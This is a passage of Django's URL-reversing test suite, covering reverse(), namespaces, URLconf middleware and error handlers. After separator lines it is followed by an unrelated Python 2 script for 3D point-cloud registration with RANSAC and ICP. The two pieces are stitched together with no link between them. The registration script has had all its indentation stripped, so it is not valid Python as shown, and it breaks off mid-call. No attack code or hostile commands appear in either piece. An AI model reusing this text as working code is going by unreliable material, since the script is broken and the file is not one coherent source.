    ('insensitive', '/CaseInsensitive/fred', ['fred'], {}),
    ('test', '/test/1', [], {}),
    ('test2', '/test/2', [], {}),
    ('inner-nothing', '/outer/42/', [], {'outer': '42'}),
    ('inner-nothing', '/outer/42/', ['42'], {}),
    ('inner-nothing', NoReverseMatch, ['foo'], {}),
    ('inner-extra', '/outer/42/extra/inner/', [], {'extra': 'inner', 'outer': '42'}),
    ('inner-extra', '/outer/42/extra/inner/', ['42', 'inner'], {}),
    ('inner-extra', NoReverseMatch, ['fred', 'inner'], {}),
    ('disjunction', NoReverseMatch, ['foo'], {}),
    ('inner-disjunction', NoReverseMatch, ['10', '11'], {}),
    ('extra-places', '/e-places/10/', ['10'], {}),
    ('extra-people', '/e-people/fred/', ['fred'], {}),
    ('extra-people', '/e-people/fred/', [], {'name': 'fred'}),
    ('part', '/part/one/', [], {'value': 'one'}),
    ('part', '/prefix/xx/part/one/', [], {'value': 'one', 'prefix': 'xx'}),
    ('part2', '/part2/one/', [], {'value': 'one'}),
    ('part2', '/part2/', [], {}),
    ('part2', '/prefix/xx/part2/one/', [], {'value': 'one', 'prefix': 'xx'}),
    ('part2', '/prefix/xx/part2/', [], {'prefix': 'xx'}),
    # Regression for #9038
    # These views are resolved by method name. Each method is deployed twice -
    # once with an explicit argument, and once using the default value on
    # the method. This is potentially ambiguous, as you have to pick the
    # correct view for the arguments provided.
    ('kwargs_view', '/arg_view/', [], {}),
    ('kwargs_view', '/arg_view/10/', [], {'arg1':10}),
    ('urlpatterns_reverse.views.absolute_kwargs_view', '/absolute_arg_view/', [], {}),
    ('urlpatterns_reverse.views.absolute_kwargs_view', '/absolute_arg_view/10/', [], {'arg1':10}),
    ('non_path_include', '/includes/non_path_include/', [], {}),
    # Tests for #13154
    ('defaults', '/defaults_view1/3/', [], {'arg1': 3, 'arg2': 1}),
    ('defaults', '/defaults_view2/3/', [], {'arg1': 3, 'arg2': 2}),
    ('defaults', NoReverseMatch, [], {'arg1': 3, 'arg2': 3}),
    ('defaults', NoReverseMatch, [], {'arg2': 1}),
)
class NoURLPatternsTests(TestCase):
    """An included urlconf without any urlpatterns must fail loudly."""

    urls = 'urlpatterns_reverse.no_urls'

    def test_no_urls_exception(self):
        """
        RegexURLResolver should raise an exception when no urlpatterns exist.
        """
        resolver = RegexURLResolver(r'^$', self.urls)
        expected_message = (
            "The included urlconf urlpatterns_reverse.no_urls "
            "doesn't have any patterns in it"
        )
        # Accessing the lazy url_patterns attribute triggers the check.
        self.assertRaisesMessage(
            ImproperlyConfigured, expected_message,
            getattr, resolver, 'url_patterns')
class URLPatternReverse(TestCase):
    """Exercise reverse() against the module-level ``test_data`` fixture."""

    urls = 'urlpatterns_reverse.urls'

    def test_urlpattern_reverse(self):
        """Each row either reverses to the expected URL or raises as expected."""
        for view_name, expected, positional, named in test_data:
            try:
                url = reverse(view_name, args=positional, kwargs=named)
            except NoReverseMatch:
                self.assertEqual(expected, NoReverseMatch)
            else:
                self.assertEqual(url, expected)

    def test_reverse_none(self):
        # Reversing None should raise an error, not return the last un-named view.
        self.assertRaises(NoReverseMatch, reverse, None)

    def test_prefix_braces(self):
        # Brace characters in the prefix must be percent-encoded.
        self.assertEqual(
            reverse('non_path_include', prefix='/{{invalid}}/'),
            '/%7B%7Binvalid%7D%7D/includes/non_path_include/')

    def test_prefix_parenthesis(self):
        # A closing parenthesis in the prefix must be percent-encoded.
        self.assertEqual(
            reverse('non_path_include', prefix='/bogus)/'),
            '/bogus%29/includes/non_path_include/')

    def test_prefix_format_char(self):
        # An existing percent escape in the prefix is itself escaped.
        self.assertEqual(
            reverse('non_path_include', prefix='/bump%20map/'),
            '/bump%2520map/includes/non_path_include/')

    def test_non_urlsafe_prefix_with_args(self):
        # Regression for #20022
        self.assertEqual(
            reverse('places', args=[1], prefix='/~me/'),
            '/%7Eme/places/1/')

    def test_patterns_reported(self):
        # Regression for #17076
        # assertRaises cannot inspect the exception text, so catch manually.
        try:
            # this url exists, but requires an argument
            reverse("people", args=[])
        except NoReverseMatch as exc:
            expected_fragment = r"1 pattern(s) tried: ['people/(?P<name>\\w+)/$']"
            self.assertIn(expected_fragment, str(exc))
        else:
            self.fail("Expected a NoReverseMatch, but none occurred.")
class ResolverTests(unittest.TestCase):
    """Tests of RegexURLResolver internals that need no test client."""

    def test_resolver_repr(self):
        """
        Test repr of RegexURLResolver, especially when urlconf_name is a list
        (#17892).
        """
        # Pick a resolver from a namespaced urlconf
        resolver = get_resolver('urlpatterns_reverse.namespace_urls')
        sub_resolver = resolver.namespace_dict['test-ns1'][1]
        self.assertIn('<RegexURLPattern list>', repr(sub_resolver))

    def test_non_regex(self):
        """
        Verifies that we raise a Resolver404 if what we are resolving doesn't
        meet the basic requirements of a path to match - i.e., at the very
        least, it matches the root pattern '^/'. We must never return None
        from resolve, or we will get a TypeError further down the line.

        Regression for #10834.
        """
        for bad_path in ('', 'a', '\\', '.'):
            self.assertRaises(Resolver404, resolve, bad_path)

    def test_404_tried_urls_have_names(self):
        """
        Verifies that the list of URLs that come back from a Resolver404
        exception contains a list in the right format for printing out in
        the DEBUG 404 page with both the patterns and URL names, if available.
        """
        urls = 'urlpatterns_reverse.named_urls'
        # this list matches the expected URL types and names returned when
        # you try to resolve a non-existent URL in the first level of included
        # URLs in named_urls.py (e.g., '/included/non-existent-url')
        url_types_names = [
            [{'type': RegexURLPattern, 'name': 'named-url1'}],
            [{'type': RegexURLPattern, 'name': 'named-url2'}],
            [{'type': RegexURLPattern, 'name': None}],
            [{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': 'named-url3'}],
            [{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': 'named-url4'}],
            [{'type': RegexURLResolver}, {'type': RegexURLPattern, 'name': None}],
            [{'type': RegexURLResolver}, {'type': RegexURLResolver}],
        ]
        try:
            resolve('/included/non-existent-url', urlconf=urls)
            self.fail('resolve did not raise a 404')
        except Resolver404 as err:
            # make sure we at least matched the root ('/') url resolver:
            self.assertIn('tried', err.args[0])
            tried = err.args[0]['tried']
            self.assertEqual(
                len(tried), len(url_types_names),
                'Wrong number of tried URLs returned. Expected %s, got %s.' % (
                    len(url_types_names), len(tried)))
            # NOTE: the inner loop previously rebound both ``tried`` and the
            # exception name ``e``, and the assertIsInstance failure message
            # sat *outside* the call as a dead tuple expression — it was never
            # passed to the assertion. Fixed by using distinct names and
            # passing the message as the msg argument.
            for candidates, expected_chain in zip(tried, url_types_names):
                for candidate, expected in zip(candidates, expected_chain):
                    self.assertIsInstance(
                        candidate, expected['type'],
                        '%s is not an instance of %s' % (candidate, expected['type']))
                    if 'name' in expected:
                        if not expected['name']:
                            self.assertIsNone(
                                candidate.name,
                                'Expected no URL name but found %s.' % candidate.name)
                        else:
                            self.assertEqual(
                                candidate.name, expected['name'],
                                'Wrong URL name. Expected "%s", got "%s".' % (
                                    expected['name'], candidate.name))
class ReverseLazyTest(TestCase):
    # URLconf whose views take their redirect targets from reverse_lazy(),
    # so the URL is only resolved when the response is actually built.
    urls = 'urlpatterns_reverse.reverse_lazy_urls'

    def test_redirect_with_lazy_reverse(self):
        # The lazily-reversed target must resolve to the final URL by the
        # time the redirect response is produced.
        response = self.client.get('/redirect/')
        self.assertRedirects(response, "/redirected_to/", status_code=301)

    def test_user_permission_with_lazy_reverse(self):
        # Created for the login below; the anonymous request must first be
        # bounced to the (lazily reversed) login URL.
        user = User.objects.create_user('alfred', 'alfred@example.com', password='testpw')
        response = self.client.get('/login_required_view/')
        self.assertRedirects(response, "/login/?next=/login_required_view/", status_code=302)
        self.client.login(username='alfred', password='testpw')
        response = self.client.get('/login_required_view/')
        self.assertEqual(response.status_code, 200)
class ReverseShortcutTests(TestCase):
    # Exercises django.shortcuts.redirect() with every kind of argument it
    # accepts: an object with get_absolute_url(), a view name, a raw URL,
    # and a view callable.
    urls = 'urlpatterns_reverse.urls'

    def test_redirect_to_object(self):
        # We don't really need a model; just something with a get_absolute_url
        class FakeObj(object):
            def get_absolute_url(self):
                return "/hi-there/"
        res = redirect(FakeObj())
        self.assertIsInstance(res, HttpResponseRedirect)
        self.assertEqual(res.url, '/hi-there/')
        # permanent=True must switch the response class to a 301.
        res = redirect(FakeObj(), permanent=True)
        self.assertIsInstance(res, HttpResponsePermanentRedirect)
        self.assertEqual(res.url, '/hi-there/')

    def test_redirect_to_view_name(self):
        res = redirect('hardcoded2')
        self.assertEqual(res.url, '/hardcoded/doc.pdf')
        res = redirect('places', 1)
        self.assertEqual(res.url, '/places/1/')
        res = redirect('headlines', year='2008', month='02', day='17')
        self.assertEqual(res.url, '/headlines/2008.02.17/')
        # An unknown view name propagates NoReverseMatch rather than
        # being treated as a URL.
        self.assertRaises(NoReverseMatch, redirect, 'not-a-view')

    def test_redirect_to_url(self):
        res = redirect('/foo/')
        self.assertEqual(res.url, '/foo/')
        res = redirect('http://example.com/')
        self.assertEqual(res.url, 'http://example.com/')

    def test_redirect_view_object(self):
        from .views import absolute_kwargs_view
        res = redirect(absolute_kwargs_view)
        self.assertEqual(res.url, '/absolute_arg_view/')
        self.assertRaises(NoReverseMatch, redirect, absolute_kwargs_view, wrong_argument=None)
class NamespaceTests(TestCase):
    """
    reverse() behaviour for namespaced URL names: plain names, names that
    require a namespace prefix, nested/embedded namespaces, application
    namespaces (with and without a default instance), and namespaces whose
    prefix captures URL arguments.
    """
    urls = 'urlpatterns_reverse.namespace_urls'

    def test_ambiguous_object(self):
        "Names deployed via dynamic URL objects that require namespaces can't be resolved"
        self.assertRaises(NoReverseMatch, reverse, 'urlobject-view')
        self.assertRaises(NoReverseMatch, reverse, 'urlobject-view', args=[37,42])
        self.assertRaises(NoReverseMatch, reverse, 'urlobject-view', kwargs={'arg1':42, 'arg2':37})

    def test_ambiguous_urlpattern(self):
        "Names deployed via dynamic URL objects that require namespaces can't be resolved"
        self.assertRaises(NoReverseMatch, reverse, 'inner-nothing')
        self.assertRaises(NoReverseMatch, reverse, 'inner-nothing', args=[37,42])
        self.assertRaises(NoReverseMatch, reverse, 'inner-nothing', kwargs={'arg1':42, 'arg2':37})

    def test_non_existent_namespace(self):
        "Non-existent namespaces raise errors"
        self.assertRaises(NoReverseMatch, reverse, 'blahblah:urlobject-view')
        self.assertRaises(NoReverseMatch, reverse, 'test-ns1:blahblah:urlobject-view')

    def test_normal_name(self):
        "Normal lookups work as expected"
        self.assertEqual('/normal/', reverse('normal-view'))
        self.assertEqual('/normal/37/42/', reverse('normal-view', args=[37,42]))
        self.assertEqual('/normal/42/37/', reverse('normal-view', kwargs={'arg1':42, 'arg2':37}))
        # '+\$*' URL-quoted; checks special characters survive reversing.
        self.assertEqual('/+%5C$*/', reverse('special-view'))

    def test_simple_included_name(self):
        "Normal lookups work on names included from other patterns"
        self.assertEqual('/included/normal/', reverse('inc-normal-view'))
        self.assertEqual('/included/normal/37/42/', reverse('inc-normal-view', args=[37,42]))
        self.assertEqual('/included/normal/42/37/', reverse('inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
        self.assertEqual('/included/+%5C$*/', reverse('inc-special-view'))

    def test_namespace_object(self):
        "Dynamic URL objects can be found using a namespace"
        self.assertEqual('/test1/inner/', reverse('test-ns1:urlobject-view'))
        self.assertEqual('/test1/inner/37/42/', reverse('test-ns1:urlobject-view', args=[37,42]))
        self.assertEqual('/test1/inner/42/37/', reverse('test-ns1:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
        self.assertEqual('/test1/inner/+%5C$*/', reverse('test-ns1:urlobject-special-view'))

    def test_embedded_namespace_object(self):
        "Namespaces can be installed anywhere in the URL pattern tree"
        self.assertEqual('/included/test3/inner/', reverse('test-ns3:urlobject-view'))
        self.assertEqual('/included/test3/inner/37/42/', reverse('test-ns3:urlobject-view', args=[37,42]))
        self.assertEqual('/included/test3/inner/42/37/', reverse('test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
        self.assertEqual('/included/test3/inner/+%5C$*/', reverse('test-ns3:urlobject-special-view'))

    def test_namespace_pattern(self):
        "Namespaces can be applied to include()'d urlpatterns"
        self.assertEqual('/ns-included1/normal/', reverse('inc-ns1:inc-normal-view'))
        self.assertEqual('/ns-included1/normal/37/42/', reverse('inc-ns1:inc-normal-view', args=[37,42]))
        self.assertEqual('/ns-included1/normal/42/37/', reverse('inc-ns1:inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
        self.assertEqual('/ns-included1/+%5C$*/', reverse('inc-ns1:inc-special-view'))

    def test_namespace_pattern_with_variable_prefix(self):
        "When using a include with namespaces when there is a regex variable in front of it"
        self.assertEqual('/ns-outer/42/normal/', reverse('inc-outer:inc-normal-view', kwargs={'outer':42}))
        self.assertEqual('/ns-outer/42/normal/', reverse('inc-outer:inc-normal-view', args=[42]))
        self.assertEqual('/ns-outer/42/normal/37/4/', reverse('inc-outer:inc-normal-view', kwargs={'outer':42, 'arg1': 37, 'arg2': 4}))
        self.assertEqual('/ns-outer/42/normal/37/4/', reverse('inc-outer:inc-normal-view', args=[42, 37, 4]))
        self.assertEqual('/ns-outer/42/+%5C$*/', reverse('inc-outer:inc-special-view', kwargs={'outer':42}))
        self.assertEqual('/ns-outer/42/+%5C$*/', reverse('inc-outer:inc-special-view', args=[42]))

    def test_multiple_namespace_pattern(self):
        "Namespaces can be embedded"
        self.assertEqual('/ns-included1/test3/inner/', reverse('inc-ns1:test-ns3:urlobject-view'))
        self.assertEqual('/ns-included1/test3/inner/37/42/', reverse('inc-ns1:test-ns3:urlobject-view', args=[37,42]))
        self.assertEqual('/ns-included1/test3/inner/42/37/', reverse('inc-ns1:test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
        self.assertEqual('/ns-included1/test3/inner/+%5C$*/', reverse('inc-ns1:test-ns3:urlobject-special-view'))

    def test_nested_namespace_pattern(self):
        "Namespaces can be nested"
        self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view'))
        self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/37/42/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', args=[37,42]))
        self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/42/37/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
        self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view'))

    def test_app_lookup_object(self):
        "A default application namespace can be used for lookup"
        self.assertEqual('/default/inner/', reverse('testapp:urlobject-view'))
        self.assertEqual('/default/inner/37/42/', reverse('testapp:urlobject-view', args=[37,42]))
        self.assertEqual('/default/inner/42/37/', reverse('testapp:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
        self.assertEqual('/default/inner/+%5C$*/', reverse('testapp:urlobject-special-view'))

    def test_app_lookup_object_with_default(self):
        "A default application namespace is sensitive to the 'current' app can be used for lookup"
        self.assertEqual('/included/test3/inner/', reverse('testapp:urlobject-view', current_app='test-ns3'))
        self.assertEqual('/included/test3/inner/37/42/', reverse('testapp:urlobject-view', args=[37,42], current_app='test-ns3'))
        self.assertEqual('/included/test3/inner/42/37/', reverse('testapp:urlobject-view', kwargs={'arg1':42, 'arg2':37}, current_app='test-ns3'))
        self.assertEqual('/included/test3/inner/+%5C$*/', reverse('testapp:urlobject-special-view', current_app='test-ns3'))

    def test_app_lookup_object_without_default(self):
        "An application namespace without a default is sensitive to the 'current' app can be used for lookup"
        self.assertEqual('/other2/inner/', reverse('nodefault:urlobject-view'))
        self.assertEqual('/other2/inner/37/42/', reverse('nodefault:urlobject-view', args=[37,42]))
        self.assertEqual('/other2/inner/42/37/', reverse('nodefault:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
        self.assertEqual('/other2/inner/+%5C$*/', reverse('nodefault:urlobject-special-view'))
        self.assertEqual('/other1/inner/', reverse('nodefault:urlobject-view', current_app='other-ns1'))
        self.assertEqual('/other1/inner/37/42/', reverse('nodefault:urlobject-view', args=[37,42], current_app='other-ns1'))
        self.assertEqual('/other1/inner/42/37/', reverse('nodefault:urlobject-view', kwargs={'arg1':42, 'arg2':37}, current_app='other-ns1'))
        self.assertEqual('/other1/inner/+%5C$*/', reverse('nodefault:urlobject-special-view', current_app='other-ns1'))

    def test_special_chars_namespace(self):
        self.assertEqual('/+%5C$*/included/normal/', reverse('special:inc-normal-view'))
        self.assertEqual('/+%5C$*/included/normal/37/42/', reverse('special:inc-normal-view', args=[37,42]))
        self.assertEqual('/+%5C$*/included/normal/42/37/', reverse('special:inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
        self.assertEqual('/+%5C$*/included/+%5C$*/', reverse('special:inc-special-view'))

    def test_namespaces_with_variables(self):
        "Namespace prefixes can capture variables: see #15900"
        self.assertEqual('/inc70/', reverse('inc-ns5:inner-nothing', kwargs={'outer': '70'}))
        self.assertEqual('/inc78/extra/foobar/', reverse('inc-ns5:inner-extra', kwargs={'outer':'78', 'extra':'foobar'}))
        self.assertEqual('/inc70/', reverse('inc-ns5:inner-nothing', args=['70']))
        self.assertEqual('/inc78/extra/foobar/', reverse('inc-ns5:inner-extra', args=['78','foobar']))
class RequestURLconfTests(TestCase):
    """
    Tests for per-request URLconf overriding via middleware
    (request.urlconf), including reversing inside response and streaming
    middleware against the overridden vs. the default URLconf.
    """
    def setUp(self):
        # Save and swap settings by hand; restored in tearDown.
        self.root_urlconf = settings.ROOT_URLCONF
        self.middleware_classes = settings.MIDDLEWARE_CLASSES
        settings.ROOT_URLCONF = urlconf_outer.__name__

    def tearDown(self):
        settings.ROOT_URLCONF = self.root_urlconf
        settings.MIDDLEWARE_CLASSES = self.middleware_classes

    def test_urlconf(self):
        response = self.client.get('/test/me/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, b'outer:/test/me/,'
                                           b'inner:/inner_urlconf/second_test/')
        response = self.client.get('/inner_urlconf/second_test/')
        self.assertEqual(response.status_code, 200)
        response = self.client.get('/second_test/')
        self.assertEqual(response.status_code, 404)

    def test_urlconf_overridden(self):
        # ChangeURLconfMiddleware replaces request.urlconf, so the outer
        # URLs stop resolving and the inner ones take over.
        settings.MIDDLEWARE_CLASSES += (
            '%s.ChangeURLconfMiddleware' % middleware.__name__,
        )
        response = self.client.get('/test/me/')
        self.assertEqual(response.status_code, 404)
        response = self.client.get('/inner_urlconf/second_test/')
        self.assertEqual(response.status_code, 404)
        response = self.client.get('/second_test/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, b'outer:,inner:/second_test/')

    def test_urlconf_overridden_with_null(self):
        settings.MIDDLEWARE_CLASSES += (
            '%s.NullChangeURLconfMiddleware' % middleware.__name__,
        )
        self.assertRaises(ImproperlyConfigured, self.client.get, '/test/me/')

    def test_reverse_inner_in_response_middleware(self):
        """
        Test reversing an URL from the *overridden* URLconf from inside
        a response middleware.
        """
        settings.MIDDLEWARE_CLASSES += (
            '%s.ChangeURLconfMiddleware' % middleware.__name__,
            '%s.ReverseInnerInResponseMiddleware' % middleware.__name__,
        )
        response = self.client.get('/second_test/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, b'/second_test/')

    def test_reverse_outer_in_response_middleware(self):
        """
        Test reversing an URL from the *default* URLconf from inside
        a response middleware.
        """
        settings.MIDDLEWARE_CLASSES += (
            '%s.ChangeURLconfMiddleware' % middleware.__name__,
            '%s.ReverseOuterInResponseMiddleware' % middleware.__name__,
        )
        message = "Reverse for 'outer' with arguments '()' and keyword arguments '{}' not found."
        with self.assertRaisesMessage(NoReverseMatch, message):
            self.client.get('/second_test/')

    def test_reverse_inner_in_streaming(self):
        """
        Test reversing an URL from the *overridden* URLconf from inside
        a streaming response.
        """
        settings.MIDDLEWARE_CLASSES += (
            '%s.ChangeURLconfMiddleware' % middleware.__name__,
            '%s.ReverseInnerInStreaming' % middleware.__name__,
        )
        response = self.client.get('/second_test/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(b''.join(response), b'/second_test/')

    def test_reverse_outer_in_streaming(self):
        """
        Test reversing an URL from the *default* URLconf from inside
        a streaming response.
        """
        settings.MIDDLEWARE_CLASSES += (
            '%s.ChangeURLconfMiddleware' % middleware.__name__,
            '%s.ReverseOuterInStreaming' % middleware.__name__,
        )
        message = "Reverse for 'outer' with arguments '()' and keyword arguments '{}' not found."
        with self.assertRaisesMessage(NoReverseMatch, message):
            # The streaming body is lazy, so the NoReverseMatch only fires
            # when the response is iterated, not on get() itself.
            self.client.get('/second_test/')
            b''.join(self.client.get('/second_test/'))
class ErrorHandlerResolutionTests(TestCase):
    """Tests for handler400, handler404 and handler500"""

    def setUp(self):
        from django.core.urlresolvers import RegexURLResolver
        # One URLconf names its handlers with dotted strings, the other
        # provides them as callables; both must resolve identically.
        urlconf = 'urlpatterns_reverse.urls_error_handlers'
        urlconf_callables = 'urlpatterns_reverse.urls_error_handlers_callables'
        self.resolver = RegexURLResolver(r'^$', urlconf)
        self.callable_resolver = RegexURLResolver(r'^$', urlconf_callables)

    def test_named_handlers(self):
        from .views import empty_view
        handler = (empty_view, {})
        self.assertEqual(self.resolver.resolve400(), handler)
        self.assertEqual(self.resolver.resolve404(), handler)
        self.assertEqual(self.resolver.resolve500(), handler)

    # Renamed from the misspelled "test_callable_handers" so the name
    # matches what the test actually checks.
    def test_callable_handlers(self):
        from .views import empty_view
        handler = (empty_view, {})
        self.assertEqual(self.callable_resolver.resolve400(), handler)
        self.assertEqual(self.callable_resolver.resolve404(), handler)
        self.assertEqual(self.callable_resolver.resolve500(), handler)
class DefaultErrorHandlerTests(TestCase):
    # URLconf that deliberately omits handler404/handler500 definitions.
    urls = 'urlpatterns_reverse.urls_without_full_import'

    def test_default_handler(self):
        "If the urls.py doesn't specify handlers, the defaults are used"
        try:
            response = self.client.get('/test/')
            self.assertEqual(response.status_code, 404)
        except AttributeError:
            self.fail("Shouldn't get an AttributeError due to undefined 404 handler")
        try:
            # The view raises ValueError; the default 500 handler must let
            # it propagate rather than blow up on a missing handler.
            self.assertRaises(ValueError, self.client.get, '/bad_view/')
        except AttributeError:
            self.fail("Shouldn't get an AttributeError due to undefined 500 handler")
class NoRootUrlConfTests(TestCase):
    """Tests for handler404 and handler500 if urlconf is None"""
    # Explicitly unset the URLconf for this TestCase.
    urls = None

    def test_no_handler_exception(self):
        self.assertRaises(ImproperlyConfigured, self.client.get, '/test/me/')
class ResolverMatchTests(TestCase):
    urls = 'urlpatterns_reverse.namespace_urls'

    def test_urlpattern_resolve(self):
        # resolve_test_data is a module-level table of
        # (path, name, app_name, namespace, func, args, kwargs) rows.
        for path, name, app_name, namespace, func, args, kwargs in resolve_test_data:
            # Test legacy support for extracting "function, args, kwargs"
            match_func, match_args, match_kwargs = resolve(path)
            self.assertEqual(match_func, func)
            self.assertEqual(match_args, args)
            self.assertEqual(match_kwargs, kwargs)
            # Test ResolverMatch capabilities.
            match = resolve(path)
            self.assertEqual(match.__class__, ResolverMatch)
            self.assertEqual(match.url_name, name)
            self.assertEqual(match.args, args)
            self.assertEqual(match.kwargs, kwargs)
            self.assertEqual(match.app_name, app_name)
            self.assertEqual(match.namespace, namespace)
            self.assertEqual(match.func, func)
            # ... and for legacy purposes:
            self.assertEqual(match[0], func)
            self.assertEqual(match[1], args)
            self.assertEqual(match[2], kwargs)

    def test_resolver_match_on_request(self):
        response = self.client.get('/resolver_match/')
        resolver_match = response.resolver_match
        self.assertEqual(resolver_match.url_name, 'test-resolver-match')

    def test_resolver_match_on_request_before_resolution(self):
        # Before routing has run, a bare HttpRequest carries no match.
        request = HttpRequest()
        self.assertIsNone(request.resolver_match)
class ErroneousViewTests(TestCase):
    # URLconf full of intentionally broken view references.
    urls = 'urlpatterns_reverse.erroneous_urls'

    def test_erroneous_resolve(self):
        # Import failures surface as ImportError; missing or uncallable
        # attributes surface as ViewDoesNotExist.
        self.assertRaises(ImportError, self.client.get, '/erroneous_inner/')
        self.assertRaises(ImportError, self.client.get, '/erroneous_outer/')
        self.assertRaises(ViewDoesNotExist, self.client.get, '/missing_inner/')
        self.assertRaises(ViewDoesNotExist, self.client.get, '/missing_outer/')
        self.assertRaises(ViewDoesNotExist, self.client.get, '/uncallable/')

    def test_erroneous_reverse(self):
        """
        Ensure that a useful exception is raised when a regex is invalid in the
        URLConf.
        Refs #6170.
        """
        # The regex error will be hit before NoReverseMatch can be raised
        self.assertRaises(ImproperlyConfigured, reverse, 'whatever blah blah')
class ViewLoadingTests(TestCase):
    def test_view_loading(self):
        # A missing view (identified by an AttributeError) should raise
        # ViewDoesNotExist, ...
        six.assertRaisesRegex(self, ViewDoesNotExist, ".*View does not exist in.*",
                              get_callable,
                              'urlpatterns_reverse.views.i_should_not_exist')
        # ... but if the AttributeError is caused by something else don't
        # swallow it.
        self.assertRaises(AttributeError, get_callable,
                          'urlpatterns_reverse.views_broken.i_am_broken')
|
|
#!/usr/bin/env python
# encoding: utf-8
"""
Author: Isabel Restrepo
A script that encapsulates 3d-registration algorithms in the PVM
September 12, 2012
"""
import os, sys, argparse
sys.path.append(os.pardir)
import reg3d
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--root_dir", action="store", type=str,
dest="root_dir",
default="",
help="Path to root directory - where all sites are")
parser.add_argument("--site", action="store", type=str,
dest="site",
default="",
help="Name of the scene e.g downtown")
parser.add_argument("--src_str", action="store", type=str,
dest="src_str",
default="",
help="Identifying string for source site e.g 2011")
parser.add_argument("--tgt_str", action="store", type=str,
dest="tgt_str",
default="",
help="Identifying string for target site e.g 2011")
parser.add_argument("--reg_ia", action="store_true",
dest="reg_ia",
help="Run initial alignment")
parser.add_argument("--reg_icp", action="store_true",
dest="reg_icp",
help="Run ICP")
parser.add_argument("--vis_ia", action="store_true",
dest="vis_ia",
help="Visualize initial alignment")
parser.add_argument("--vis_icp", action="store_true",
dest="vis_icp",
help="Visualize ICP")
parser.add_argument("--plot_Terror", action="store_true",
dest="plot_Terror",
help="Plot Transformation errors")
parser.add_argument("--descriptor", action="store", type=str,
dest="descriptor", default="FPFH",
help="Trial number")
parser.add_argument("--basename_in", action="store", type=str,
dest="basename_in", default="gauss_233_normals_pvn",
help="string identifying .ply eg gauss_233_normals_pvn")
parser.add_argument("--cropped", action="store_true",
dest="cropped",
help="Are we using a cropped version?")
parser.add_argument("--rej_normals", action="store_true",
dest="rej_normals",
help="Reject normals?")
parser.add_argument("--compute_scale", action="store_true",
dest="compute_scale",
help="compute scale? or read it from gt_transfomation")
parser.add_argument("--bound_scale", action="store_true",
dest="bound_scale",
help="set upper and lower bound for scale")
parser.add_argument("--bound_percentile", action="store", type=int,
dest="bound_percentile", default=1,
help="bound_percentile (on scale) to use")
parser.add_argument("--verbose", action="store_true",
dest="verbose",
help="Print or redirect to log file")
parser.add_argument("--n_iter", action="store", type=int,
dest="n_iter", default=200,
help="Number of iterations")
parser.add_argument("--nsamples", action="store", type=int,
dest="nsamples", default=3,
help="Number of iterations")
parser.add_argument("--sample_distance", action="store", type=int,
dest="sample_distance", default=1,
help="Min. RANSAC sample distance = this*radius*resolution")
parser.add_argument("--geo", action="store_true",
dest="geo",
help="Use reoregistered clouds?")
parser.add_argument("--percentile", action="store", type=int,
dest="percentile", default=99,
help="percentile to use")
args = parser.parse_args()
print args
gt_root_dir = args.root_dir + "/" + args.site + "_" + args.tgt_str + "/original"
trial_root_dir = args.root_dir + "/" + args.site + "_" + args.src_str + "/original"
descriptor_type = args.descriptor
gt_fname = args.src_str + "-" + args.tgt_str + "_Hs.txt"
radius = 30
percentile = args.percentile
verbose = args.verbose
descriptor_string = "descriptors"
aux_output_string = args.src_str + "-" + args.src_str
# aux_output_string = args.src_str + "-" + args.src_str #+ "_" + str(args.nsamples) + "_" + str(args.sample_distance)
#Note: when I run the experiment the output files were labeled by mistake src-src
# this is the correct name
if args.compute_scale:
aux_output_string = args.src_str + "-" + args.tgt_str + "_" + str(args.nsamples) + "_" + str(args.sample_distance)
if args.cropped:
descriptor_string = descriptor_string + "_cropped"
aux_output_string = aux_output_string + "-cropped"
print descriptor_string, aux_output_string
if args.compute_scale:
aux_output_string = aux_output_string + "_scale"
if args.bound_scale:
aux_output_string = aux_output_string + "_bound_" + str(args.bound_percentile)
print descriptor_string, aux_output_string
if args.reg_ia:
print "Running IA"
ransac_scale, avg_scale = reg3d.register_ia(gt_root_dir = gt_root_dir,
trial_root_dir = trial_root_dir,
descriptor_type = descriptor_type,
radius = radius,
percentile = percentile,
nr_iterations = args.n_iter,
nsamples = args.nsamples,
sample_distance = args.sample_distance,
compute_scale = args.compute_scale,
bound_scale = args.bound_scale,
bound_percentile = args.bound_percentile,
verbose = verbose,
aux_output_string = aux_output_string,
descriptor_string = descriptor_string,
basename_in = args.basename_in,
gt_fname = gt_fname)
print "ransac_scale: ", ransac_scale
print "avg_scale: ", avg_scale
# if args.compute_scale:
# reg3d.register_ia(gt_root_dir = gt_root_dir,
# trial_root_dir = trial_root_dir,
# descriptor_type = descriptor_type,
# radius = radius,
# percentile = percentile,
# nr_iterations = args.n_iter,
# nsamples = 3,
# sample_distance = 1,
# compute_scale = False,
# verbose = verbose,
# aux_output_string = aux_output_string + "_sac",
# descriptor_string = descriptor_string,
# basename_in = args.basename_in,
# gt_fname = gt_fname,
# scale = ransac_scale)
if args.reg_icp:
print "Running ICP"
reg3d.register_icp(gt_root_dir = gt_root_dir,
trial_root_dir = trial_root_dir,
descriptor_type = descriptor_type,
radius = radius,
percentile = percentile,
nr_iterations = args.n_iter,
compute_scale = args.compute_scale,
use_max_nr_iter = True,
verbose = verbose,
aux_output_string = aux_output_string,
